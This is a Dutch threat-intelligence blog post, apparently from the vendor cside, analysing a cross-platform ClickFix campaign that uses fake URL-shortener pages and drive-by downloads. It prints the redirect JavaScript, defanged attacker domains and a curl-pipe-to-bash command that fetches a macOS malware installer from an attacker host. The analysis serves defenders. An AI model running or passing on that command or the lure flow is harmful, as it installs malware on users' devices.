Kort samengevat: ClickFix-keten via cutt.ly-shortener die macOS, Android en iOS raakt met drive-by tarball
- Niet alleen Windows: ClickFix werd gearchiveerd als Windows PowerShell-prompts en vergeten. Dat mentale model is precies waarom dezelfde social-engineeringketen nu werkt op macOS-terminals, Android drive-by downloads en iOS-tarballs met wachtwoordbeveiliging.
- De aanvalsketen: De keten begon met idjhvn4m[.]pro dat ongewoon schone JavaScript laadde, redirectte via kbmljxm[.]com en een legitieme cutt.ly-shortener, en dropte vervolgens een macOS shell-script vanaf vuwzer[.]com dat door 10 engines werd gedetecteerd, en een mobiele payload van iteslawow[.]com die door 5 engines op VirusTotal werd gedetecteerd. cside legt vast welk script elke gebruiker daadwerkelijk ontvangt en gebruikt LLM-geassisteerde detectie om OS-gerichte downloadflows te markeren.
- Herzie de aanname: Als je endpointteam ClickFix afdeed als een Windows-probleem, herzie die aanname dan deze week. De aanvallers zijn cross-platform gegaan, en statische scanners krijgen nog steeds schone content voorgeschoteld omdat ze de redirect-keten die de bezoeker ziet, niet kunnen zien.
Weinig tijd? Bekijk cside's in-browser Magecart- en skimmerblokkering. Dit dekt alles hieronder in één deployment.
Wat begon als een op Windows gerichte social-engineeringtruc, is uitgegroeid tot een bedreiging op meerdere platforms aan de clientzijde. In dit artikel bespreken we een recente ClickFix-variant die zich nu richt op macOS, Android en iOS, met behulp van browsergebaseerde omleidingen, valse UI-prompts en drive-by-downloadtechnieken.
Wat is een ClickFix-aanval?
ClickFix-aanvallen zijn niet nieuw. Mijn eerste ontmoeting hiermee was in september 2024:

Een ClickFix-aanval is een vorm van gerichte social engineering of client-side aanval waarbij misbruik wordt gemaakt van het instinct van een gebruiker om "het probleem gewoon op te lossen". Het begint meestal met een overtuigend bericht dat wijst op een vermeend probleem (zoals een beveiligingslek of een repositoryprobleem). De gebruiker wordt aangespoord om op een link te klikken of een commando uit te voeren, in de veronderstelling dat hij iets belangrijks oplost.
In dit aanvalsvoorbeeld wordt de gebruiker gevraagd een script in de terminal uit te voeren. Op Windows betekende dat PowerShell. Dezelfde techniek werkt ook op macOS en Linux. En net als bij Windows ging ik ervan uit dat gebruikers hier niet in zouden trappen.
Aannames zijn echter een gevaarlijk spel in cybersecurity, wat helaas opnieuw werd bewezen.
Wij zijn cside en we monitoren client-side aanvallen met scripts van derden en verbeteren realtime beveiliging aan de clientzijde voor websites en hun gebruikers. Alleen al in de afgelopen drie maanden hebben we meer dan 300.000 gecompromitteerde websites waargenomen.
Dit is de tweede keer dat we het nieuws brengen over aanvallers die hun TTP's (Tactics, Techniques, and Procedures) verder ontwikkelen.
Maar wat ooit een bedreiging was die alleen Windows trof, richt zich nu ook op andere besturingssystemen.
De aanval in detail
We ontvingen een waarschuwing voor JavaScript dat werd gedownload van:
hxxps://idjhvn4m[.]pro?h=7bd350a4ed55a8faf2e45301d70d2&user=16Het geleverde script:
(function () { var sitename = document.querySelector("meta[property='og:url']").getAttribute("content"); const mysite = new URL(sitename);const mysitename = `${mysite.protocol}//${mysite.hostname}`;var mytitle = document.querySelector("meta[property='og:title']").getAttribute("content"); var xtitle_spe = mytitle.replace(/[&\/\\#, +()$~%.'":*?<>{}]/g, '-'); var xtitle_spa = xtitle_spe.replace(/\s+/g, '-'); var oldurl = 'https://kbmljxm.com/?s={KEYWORD}&p=16'; var final_url_1 = oldurl.replace('{KEYWORD}', xtitle_spa);var final_url_2 = final_url_1.replace('{site}', mysitename); var id = 16; var successResponse = final_url_2; var elements = document.getElementsByClassName("buttonPress-"+16); for(var i = 0; i < elements.length; i++) {var anchor = elements[i];anchor.onclick = function() {window.open(successResponse, '_blank');}} })();
Deze JavaScript is niet sterk versluierd, wat ongebruikelijk is voor dit soort aanvallen. Het creëert een klikhandler voor elementen met een specifieke klassenaam die bij een klik een URL in een nieuw tabblad opent. Dit is wat het doet:
- Neemt een sjabloon-URL (hxxps://kbmljxm[.]com/?s={KEYWORD}&p=16)
- Vervangt {KEYWORD} door de verwerkte paginatitel
- Koppelt klikhandlers aan alle elementen met de klasse buttonPress-16
- Wanneer erop wordt geklikt, openen deze elementen de samengestelde URL in een nieuw tabblad
Hieronder staat de omleidingsketen:


Omleidingsketen op de gebruikersinterface
De pagina ziet eruit als een URL-verkorter en vraagt de gebruiker een link te kopiëren. De aanvallers maken misbruik van cutt[.]ly, een legitieme URL-verkorter.
Wanneer een gebruiker de verkorte URL in de browser plakt, wordt hij of zij doorgestuurd naar:

Deze nagebootste URL-verkorterpagina laat de volgende pop-up zien:
"Plak de link die je hebt gekopieerd in de adresregel van de browser."

Vervolgens wordt de gebruiker doorgestuurd naar een downloadpagina (in dit geval voor macOS):

/bin/bash -c "$(curl -fsSL hxxps://vuwzer[.]com/get/install.sh)"
De inhoud van dit shellbestand is als volgt te zien in deze screenshot:

Dit shellscript downloadt vervolgens een macOS-uitvoerbaar bestand (gedetecteerd door 10 antivirus-engines op VirusTotal).

Gedrag op Android en iOS
Toen we dit op Android en iOS testten, verwachtten we een ClickFix-variant. In plaats daarvan kwamen we een drive-by-aanval tegen.
Een drive-by-aanval is een type cyberaanval waarbij kwaadaardige code wordt uitgevoerd of naar een apparaat gedownload simpelweg door een gecompromitteerde of kwaadaardige webpagina te bezoeken. Er is geen klik, installatie of interactie nodig.
De pagina stuurde ons nu door naar:
hxxps://iteslawow[.]com/?=ijn&diu=16&sid=npT
Deze site downloadde een .tar-bestand - beveiligd met een 7zip-wachtwoord - dat de malware uitpakte en plaatste (gedetecteerd door 5 AV-engines). Het werd ook gedetecteerd door 5 leveranciers op VirusTotal.
Het werd gedetecteerd door 5 leveranciers op VirusTotal.

Zowel op Android als op Windows werd deze drive-by-aanvalsstijl gebruikt.
Deze aanval laat zien hoe ver aanvallers hun bereik uitbreiden. Wat begon als een Windows-specifieke ClickFix-campagne richt zich nu op macOS, Android en iOS, wat de schaal van de operatie aanzienlijk vergroot.
Het is opnieuw een herinnering aan hoe wijdverspreid client-side aanvallen zijn geworden, en de vele vormen die ze kunnen aannemen, allemaal door misbruik te maken van het vertrouwen dat gebruikers stellen in browserinteracties wanneer beveiliging aan de clientzijde ontbreekt of slecht wordt afgedwongen.









